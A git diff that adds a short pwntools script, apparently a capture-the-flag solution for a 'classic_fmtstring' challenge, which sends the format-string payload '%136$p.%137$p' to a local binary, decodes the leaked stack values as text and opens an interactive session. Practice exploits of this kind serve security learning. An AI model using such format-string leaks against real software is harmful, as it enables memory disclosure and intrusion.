diff --git a/random_challs/classic_fmtstring/a.py b/random_challs/classic_fmtstring/a.py
new file mode 100644
index 0000000..8c9e937
--- /dev/null
+++ b/random_challs/classic_fmtstring/a.py
@@ -0,0 +1,17 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./fmt", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# leak
+s(b"%136$p.%137$p")
+r.recvuntil(b"Here: ")
+out = "".join([unhex(a[2:])[::-1].decode() for a in r.recvlineS().split(".")])
+print(out)
+
+r.interactive()
\ No newline at end of file